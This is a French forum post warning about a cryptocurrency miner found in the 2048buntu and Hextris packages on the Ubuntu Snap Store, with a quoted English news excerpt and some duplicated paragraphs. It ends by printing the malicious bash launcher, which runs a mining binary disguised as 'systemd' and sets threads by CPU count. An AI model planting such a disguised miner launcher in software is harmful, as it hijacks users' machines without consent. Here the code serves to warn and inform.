Malware trouvé dans l'Ubuntu Snap Store
Publié : 13 mai 2018, 02:36
En fait, un bitcoin miner. Le coupable qui se fait appeler Nicolas Tomb a été viré du store. Les logiciels infectés étaient à première vue les jeux 2048buntu and Hextris.
Cependant, une simple recherche va vous donner d'innombrable échos de ce problème grave. Une chose est certaine, regardez-y à 2 fois avant d'installer un Snap (installable aussi sur Manjaro puisque universel). Je pense aussi qu'il faut se méfier de tout, et peut-être (?) aussi des packages Appimage. Je viens juste d'en installer un et pas des moindres puisqu'il s'agit de Wire Desktop (Messagerie). Il s'agit généralement d'applications dites "portables" donc très faciles à supprimer. Pour Wire, je ne m'inquiète pas trop vu que ça n'est pas leur intérêt de faire des c... (ils ont aussi des plans "Pro")
Bon, je pense que pour sa first Ferrari, ça va être reporté à une date ultérieure
Voici la partie du script en accusation:
Lien: recherche sur ce thème: https://www.google.com/search?client=op ... 8&oe=UTF-8
Source: https://www.linuxuprising.com/2018/05/m ... store.htmlAt least two of the snap packages, 2048buntu and Hextris, uploaded to the Ubuntu Snaps Store by user Nicolas Tomb, contained malware. All packages by Nicolas have since been removed from the Ubuntu Snaps Store, "pending further investigations".
Cependant, une simple recherche va vous donner d'innombrable échos de ce problème grave. Une chose est certaine, regardez-y à 2 fois avant d'installer un Snap (installable aussi sur Manjaro puisque universel). Je pense aussi qu'il faut se méfier de tout, et peut-être (?) aussi des packages Appimage. Je viens juste d'en installer un et pas des moindres puisqu'il s'agit de Wire Desktop (Messagerie). Il s'agit généralement d'applications dites "portables" donc très faciles à supprimer. Pour Wire, je ne m'inquiète pas trop vu que ça n'est pas leur intérêt de faire des c... (ils ont aussi des plans "Pro")
Bon, je pense que pour sa first Ferrari, ça va être reporté à une date ultérieure
Voici la partie du script en accusation:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}